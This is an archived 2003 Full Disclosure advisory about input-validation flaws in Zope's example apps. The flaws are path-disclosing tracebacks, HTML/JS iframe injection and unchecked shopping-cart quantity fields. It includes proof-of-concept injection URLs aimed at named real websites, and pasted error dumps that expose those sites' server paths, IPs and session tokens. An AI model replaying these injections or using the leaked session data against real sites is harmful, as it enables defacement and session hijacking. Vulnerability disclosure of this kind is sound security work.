Full Disclosure mailing list archives
Zope
From: "morning_wood" <se_cur_ity () hotmail com>
Date: Sat, 21 Jun 2003 01:53:09 -0700
-= 0day - Freedom of Voice - Freedom of Choice =- ------------------------------------------------------------------ - EXPL-A-2003-009 exploitlabs.com Advisory 009 ------------------------------------------------------------------ -=- The DoPe on zOpE -=- Donnie Werner June 19, 2003 http://exploitlabs.com/files/advisories/EXPL-A-2003-009-zope.txt Product: -------- Zope -=- open source application server http://www.zope.com/ Vunerability(s): ================ 1 - Empty Upload ( physical location dump ) -=- /Examples/FileLibrary/addFile 2 - Html / js injection -=- /Examples/db/ 3 - Blank Query -=- /Examples/ShoppingCart 3a - iframe Query ( Html/js injection ) -=- /Examples/ShoppingCart/addItems 3b - Unchecked Input Lenght -=- /Examples/ShoppingCart/addItems 3c - Unchecked Characters -=- /Examples/ShoppingCart/addItems Remote: ------- yup not vurlnerable to #1 ( blank upload ) ----------------------------------- examples.. http://www.aixtraware.de/TCPware/Examples Server: Zope/(Zope 2.6.1 (binary release, python 2.1, linux2-x86), python 2.1.3, linux2) ZServer/1.1b1 http://ispg.csu.edu.au Server: Zope/(Zope 2.5.1 (source release, python 2.1, linux2), python 2.1.3, freebsd4) ZServer/1.1b1 http://www.jungle2.org Server: Zope/(Zope 2.5.1 (OpenBSD package zope-2.5.1p1), python 2.1.3, openbsd3) ZServer/1.1b1 vurlnerable ----------- Example URLS - #1: http://klever.multimedia.fh-augsburg.de Server: Zope/(Zope 2.6.1 (source release, python 2.1, linux2), python 2.1.3, linux2) ZServer/1.1b1 http://grlug.org/ Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_fastcgi/2.2.12 mod_ssl/2.8.12 OpenSSL/0.9.6b DAV/1.0.2 PHP/4.1.2 mod_perl/1.26 http://grlug.org/zope/Examples/FileLibrary/addFile Error... Zope has encountered an error while publishing this resource. Error Type: Bad Request Error Value: Empty or invalid id specified. Troubleshooting Suggestions The URL may be incorrect. The parameters passed to this resource may be incorrect. A resource that this resource relies on may be encountering an error. For more detailed information about the error, please refer to the HTML source for this page. If the error persists please contact the site maintainer. Thank you for your patience. Traceback (innermost last): File /usr/local/src/zope/lib/python/ZPublisher/Publish.py, line 150, in publish_module File /usr/local/src/zope/lib/python/ZPublisher/Publish.py, line 114, in publish File /usr/local/src/zope/lib/python/Zope/__init__.py, line 159, in zpublisher_exception_hook (Object: FileLibrary) File /usr/local/src/zope/lib/python/ZPublisher/Publish.py, line 98, in publish File /usr/local/src/zope/lib/python/ZPublisher/mapply.py, line 88, in mapply (Object: addFile) File /usr/local/src/zope/lib/python/ZPublisher/Publish.py, line 39, in call_object (Object: addFile) File /usr/local/src/zope/lib/python/Shared/DC/Scripts/Bindings.py, line 252, in __call__ (Object: addFile) File /usr/local/src/zope/lib/python/Shared/DC/Scripts/Bindings.py, line 283, in _bindAndExec (Object: addFile) File /usr/local/src/zope/lib/python/Products/PythonScripts/PythonScript.py, line 302, in _exec (Object: addFile) (Info: ({'script': <PythonScript instance at 8c23a90>, 'context': <Folder instance at 89548e0>, 'container': <Folder instance at 89548e0>, 'traverse_subpath': []}, (<ZPublisher.HTTPRequest.FileUpload instance at 0x8b2eba4>,), {}, None)) File Script (Python), line 7, in addFile File /usr/local/src/zope/lib/python/OFS/Image.py, line 52, in manage_addFile (Object: Files) File /usr/local/src/zope/lib/python/OFS/ObjectManager.py, line 236, in _setObject (Object: Files) File /usr/local/src/zope/lib/python/OFS/ObjectManager.py, line 53, in checkValidId (Object: Files) Bad Request: (see above) Example-1.2: http://www.pitch.com Server: Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_fastcgi/2.2.12 /Examples/FileLibrary/addFile Site Error An error was encountered while publishing this resource. Error Type: Bad Request Error Value: Empty or invalid id specified. Traceback Traceback (innermost last): File /usr/local/zope/lib/python/ZPublisher/Publish.py, line 98, in publish File /usr/local/zope/lib/python/ZPublisher/mapply.py, line 88, in mapply (Object: addFile) File /usr/local/zope/lib/python/ZPublisher/Publish.py, line 39, in call_object (Object: addFile) File /usr/local/zope/lib/python/Shared/DC/Scripts/Bindings.py, line 252, in __call__ (Object: addFile) File /usr/local/zope/lib/python/Shared/DC/Scripts/Bindings.py, line 283, in _bindAndExec (Object: addFile) File /usr/local/zope/lib/python/Products/PythonScripts/PythonScript.py, line 291, in _exec (Object: addFile) (Info: ({'script': , 'context': , 'container': , 'traverse_subpath': []}, (,), {}, None)) File Script (Python), line 7, in addFile File /usr/local/zope/lib/python/OFS/Image.py, line 52, in manage_addFile (Object: Files) File /usr/local/zope/lib/python/OFS/ObjectManager.py, line 219, in _setObject (Object: Files) File /usr/local/zope/lib/python/OFS/ObjectManager.py, line 53, in checkValidId (Object: Files) Bad Request: Empty or invalid id specified. ====================================================================== ========================== ====================================================================== ========================== Example-2.1: http://www.c-media.com.au/Examples/db/ExampledbBrowseReport http://198.78.66.174:8080/Examples/ exploit: -------- edit the "discription" field for html / js injection <iframe src=http://somesite.com</iframe> viewing of the existing databse is rendered useless ====================================================================== ========================== ====================================================================== ========================== Example-3: http://www.sfweekly.com/Examples/ShoppingCart enter a blank as a quanity entry http://www.sfweekly.com/Examples/ShoppingCart/addItems?orders.id%3Arecords=510-007&orders.quantity%3Arecords=&orders.id%3Arecords=510-122&orders.quantity%3Arecords=0&orders.id%3Arecords=510-115&orders.quantity%3Arecords=0 Site Error An error was encountered while publishing this resource. Error Type: ValueError Error Value: invalid literal for int(): Traceback Traceback (innermost last): File /usr/local/zope/lib/python/ZPublisher/Publish.py, line 98, in publish File /usr/local/zope/lib/python/ZPublisher/mapply.py, line 88, in mapply (Object: addItems) File /usr/local/zope/lib/python/ZPublisher/Publish.py, line 39, in call_object (Object: addItems) File /usr/local/zope/lib/python/Shared/DC/Scripts/Bindings.py, line 252, in __call__ (Object: addItems) File /usr/local/zope/lib/python/Shared/DC/Scripts/Bindings.py, line 283, in _bindAndExec (Object: addItems) File /usr/local/zope/lib/python/Products/PythonScripts/PythonScript.py, line 291, in _exec (Object: addItems) (Info: ({'script': , 'context': , 'container': , 'traverse_subpath': []}, ([id: '510-007', quantity: '', id: '510-122', quantity: '0', id: '510-115', quantity: '0'], formorders [id: '510-007', quantity: '', id: '510-122', quantity: '0', id: '510-115', quantity: '0'] cookies_ZopeId '23329946A0z9drL5xZk' Apache '12.230.1.165.260541049326654641' lazy itemsother_ZopeId '23329946A0z9drL5xZk' orders [id: '510-007', quantity: '', id: '510-122', quantity: '0', id: '510-115', quantity: '0'] Apache '12.230.1.165.260541049326654641' SESSION id: 10531690730759726137, token: 23329946A0z9drL5xZk, contents: [('items', {})] traverse_subpath [] SERVER_URL 'http://www.sfweekly.com' VirtualRootPhysicalPath ('', 'san') PUBLISHED <PythonScript instance at 9e01660> URL 'http://www.sfweekly.com/Examples/ShoppingCart/addItems' AUTHENTICATED_USER Anonymous User TraversalRequestNameStack [] AUTHENTICATION_PATH 'san/virtual_hosts' URL0 http://www.sfweekly.com/Examples/ShoppingCart/addItems URL1 http://www.sfweekly.com/Examples/ShoppingCart URL2 http://www.sfweekly.com/Examples URL3 http://www.sfweekly.com BASE0 http://www.sfweekly.com BASE1 http://www.sfweekly.com BASE2 http://www.sfweekly.com/Examples BASE3 http://www.sfweekly.com/Examples/ShoppingCart BASE4 http://www.sfweekly.com/Examples/ShoppingCart/addItems environDOCUMENT_ROOT '/home/nti/htdocs/san' SERVER_ADDR '63.241.135.221' HTTP_ACCEPT_ENCODING 'gzip, deflate' SCRIPT_FILENAME '/home/httpd/fastcgi/slave3' GATEWAY_INTERFACE 'CGI/1.1' SERVER_PORT '80' PATH_TRANSLATED '/home/httpd/fastcgi/slave3/VirtualHostBase/http/www.sfweekly.com:80/s an/VirtualHostRoot/VirtualHostBase/http/www.sfweekly.com:80/san/Virtua lHostRoot/Examples/ShoppingCart/addItems' source 'slave3' UNIQUE_ID 'PsYVuD-xh80AAEv9Xno' HTTP_ACCEPT_LANGUAGE 'en-us' REMOTE_ADDR '12.229.234.100' SERVER_NAME 'www.sfweekly.com' HTTP_CONNECTION 'Keep-Alive' HTTP_USER_AGENT 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; USER AGENT)' HTTP_ACCEPT 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*' REQUEST_URI '/Examples/ShoppingCart/addItems?orders.id%3Arecords=510-007&orders.qu antity%3Arecords=&orders.id%3Arecords=510-122&orders.quantity%3Arecord s=0&orders.id%3Arecords=510-115&orders.quantity%3Arecords=0' PATH '/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin' QUERY_STRING 'orders.id%3Arecords=510-007&orders.quantity%3Arecords=&orders.id%3Are cords=510-122&orders.quantity%3Arecords=0&orders.id%3Arecords=510-115& orders.quantity%3Arecords=0' SERVER_PROTOCOL 'HTTP/1.1' SCRIPT_URL '/Examples/ShoppingCart/addItems' HTTP_HOST 'www.sfweekly.com' REQUEST_METHOD 'GET' SERVER_SIGNATURE '' SCRIPT_URI 'http://www.sfweekly.com/Examples/ShoppingCart/addItems' SCRIPT_NAME '' SITE 'san' SERVER_SOFTWARE 'Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_fastcgi/2.2.12' SERVER_ADMIN 'webadmin () newtimes com' PATH_INFO '/VirtualHostBase/http/www.sfweekly.com:80/san/VirtualHostRoot/Example s/ShoppingCart/addItems' HTTP_COOKIE 'Apache=12.230.1.165.260541049326654641; _ZopeId="23329946A0z9drL5xZk"' REMOTE_PORT '21891' HTTP_REFERER 'http://www.sfweekly.com/Examples/ShoppingCart/addItems?orders.id%3Are cords=510-007&orders.quantity%3Arecords=0&orders.id%3Arecords=510-122& orders.quantity%3Arecords=0&orders.id%3Arecords=510-115&orders.quantit y%3Arecords=0' ), {}, (None,))) File Script (Python), line 11, in addItems ValueError: invalid literal for int(): ---------------------------------------------------------------------- ---------- ---------------------------------------------------------------------- ---------- orders [id: '510-007', quantity: '0', id: '510-122', quantity: '', id: '510-115', quantity: '0'] orders [id: '510-007', quantity: '0', id: '510-122', quantity: 'test', id: '510-115', quantity: '0'] ---------------------------------------------------------------------- ---------- ---------------------------------------------------------------------- ---------- example 3a: ----------- this i love... insert a iframe into the unchecked length quanity field <iframe src="http://ebay.com"></iframe> <iframe src=http://ebay.com <iframe src="http://ebay.com http://www.jungle2.org/Examples/ShoppingCart http://www.westword.com/Examples/ShoppingCart/addItems?orders.id%3Arecords=510-007&orders.quantity%3Arecords=0&orders.id%3Arecords=510-122&orders.quantity%3Arecords=%3Ciframe+src%3Dhttp%3A%2F%2Febay.com%3C%2Fiframe%3E&orders.id%3Arecords=510-115&orders.quantity%3Arecords=0 <iframe src=http://ebay.com GET /Examples/ShoppingCart/addItems?orders.id%3Arecords=510-007&orders.qua ntity%3Arecords=%3Ciframe+src%3Dhttp%3A%2F%2Febay.com&orders.id%3Areco rds=510-122&orders.quantity%3Arecords=0&orders.id%3Arecords=510-115&or ders.quantity%3Arecords=0 HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.westword.com/Examples/ShoppingCart/ Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; USER AGENT) Host: www.westword.com Cookie: Apache=12.229.228.51.196431047271232157; _ZopeId="50159375A0z9pTTmVlU" Post injection url analysis: ---------------------------- puts this URL in a second frame before the main ebay.com frame, injecting and appending the original info to the exterlal url reference resulting in 2 iframes as evidenced by: <iframe src=http://ebay.com/ http://ebay.com/', http://ebay.com',%20id:%20'510-122',%20quantity:%20'0',%20id:%20'510-115',%20quantity:%20'0'],%20<h3>form</h3><table><tr%20valign= <iframe src=http://ebay.com http://ebay.com',/ http://ebay.com/ <iframe src="http://ebay.com"></iframe> http://ebay.com/ Example 3b - 3c: ---------------- Sending any string longer that 11 characters in the quanity field causes a dump. details here... http://www.sfweekly.com/calendar/Examples/ShoppingCart/addItems?orders.id%3Arecords=510-007&orders.quantity%3Arecords=123456789101112131415&orders.id%3Arecords=510-122&orders.quantity%3Arecords=+%3Ctd%3ENeed+to+go+out+of+town+for+a+few+days%2C+and+no+one+can+feed+your+pigeons%3F+Don%27t+worry%2C+we+now+have+the+virtually+spillproof+hopper+feeder.+Made+from+birch+plywood+it+holds+from+30+to+35+pounds+of+grain.+Pigeons+can+get+at+the+feed+through+holes+in+the+plexiglass+cover%2C+but+will+not+be+able+to+kick+out+any+feed.%3C%2Ftd%3E&orders.id%3Arecords=510-115&orders.quantity%3Arecords=0 reveal these items.. SESSION id: 10546821410043251757, token: 40684361A01gE7Hjjvc, contents: [] SERVER_URL 'http://www.sfweekly.com' VirtualRootPhysicalPath ('', 'san') PUBLISHED <PythonScript instance at 96c4040> URL 'http://www.sfweekly.com/calendar/Examples/ShoppingCart/addItems' AUTHENTICATED_USER Anonymous User TraversalRequestNameStack [] AUTHENTICATION_PATH 'san/virtual_hosts' URL0 http://www.sfweekly.com/calendar/Examples/ShoppingCart/addItems URL1 http://www.sfweekly.com/calendar/Examples/ShoppingCart URL2 http://www.sfweekly.com/calendar/Examples URL3 http://www.sfweekly.com/calendar URL4 http://www.sfweekly.com BASE0 http://www.sfweekly.com BASE1 http://www.sfweekly.com BASE2 http://www.sfweekly.com/calendar BASE3 http://www.sfweekly.com/calendar/Examples BASE4 http://www.sfweekly.com/calendar/Examples/ShoppingCart BASE5 http://www.sfweekly.com/calendar/Examples/ShoppingCart/addItems environ DOCUMENT_ROOT '/home/nti/htdocs/san' SERVER_ADDR '63.241.135.221' HTTP_ACCEPT_ENCODING 'gzip, deflate' SCRIPT_FILENAME '/home/httpd/fastcgi/slave2' GATEWAY_INTERFACE 'CGI/1.1' SERVER_PORT '80' PATH_TRANSLATED '/home/httpd/fastcgi/slave3/VirtualHostBase/http/www.sfweekly.com:80/s an/VirtualHostRoot/VirtualHostBase/http/www.sfweekly.com:80/san/Virtua lHostRoot/calendar/Examples/ShoppingCart/addItems' source 'slave2' UNIQUE_ID 'Pt02bz-xh80AAC79HHU' =================================================================== extra notes =================================================================== Update of /cvs-repository/Releases/Zope/lib/python/Products/PythonScripts In directory cvs.zope.org:/tmp/cvs-serv29374/Products/PythonScripts Modified Files: Utility.py module_access_examples.py Log Message: Merge evan-modsec_fix-branch === Releases/Zope/lib/python/Products/PythonScripts/Utility.py 1.4 => 1.5 === __version__='$Revision$'[11:-2] -from AccessControl import ModuleSecurityInfo, ClassSecurityInfo -from Globals import InitializeClass -import string - -def allow_module(module_name): - """Allow a module and all its contents to be used from a - restricted Script. The argument module_name may be a simple - or dotted module or package name. Note that if a package - path is given, all modules in the path will be available.""" - ModuleSecurityInfo(module_name).setDefaultAccess(1) - dot = string.find(module_name, '.') - while dot > 0: - ModuleSecurityInfo(module_name[:dot]).setDefaultAccess(1) - dot = string.find(module_name, '.', dot + 1) - -def allow_class(Class): - """Allow a class and all of its methods to be used from a - restricted Script. The argument Class must be a class.""" - Class._security = sec = ClassSecurityInfo() - sec.declareObjectPublic() - sec.setDefaultAccess(1) - sec.apply(Class) - InitializeClass(Class) +# These have been relocated, and should be imported from AccessControl +from AccessControl import allow_module, allow_class === Releases/Zope/lib/python/Products/PythonScripts/module_access_examples .py 1.1 => 1.2 === ''' -from Products.PythonScripts.Utility import allow_module, allow_class +from AccessControl import allow_module, allow_class, allow_type from AccessControl import ModuleSecurityInfo, ClassSecurityInfo from Globals import InitializeClass @@ -42,9 +42,9 @@ # ModuleSecurityInfo('re').declarePublic('compile', 'findall', # 'match', 'search', 'split', 'sub', 'subn', 'error', # 'I', 'L', 'M', 'S', 'X') -# from re import RegexObject, MatchObject -# allow_class(RegexObject) -# allow_class(MatchObject) +# import re +# allow_type(type(re.compile(''))) +# allow_type(type(re.match('x','x'))) # ModuleSecurityInfo('StringIO').declarePublic('StringIO' Vendor Fix: ----------- No fix on 0day Vendor Contact: --------------- info () zope com - Concurrent with this advisory Credits: -------- Donnie Werner http://exploitlabs.com "finding your holes" morning_wood () frame4 com - get tested ---------------------------------------------------------------------- --- be a good vendor... test your products first, it is your problem, fix it. http://nothackers.org - it's t0day ---------------------------------------------------------------------- --- _______________________________________________ 0day mailing list 0day () nothackers org http://nothackers.org/mailman/listinfo/0day _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Zope morning_wood (Jun 21)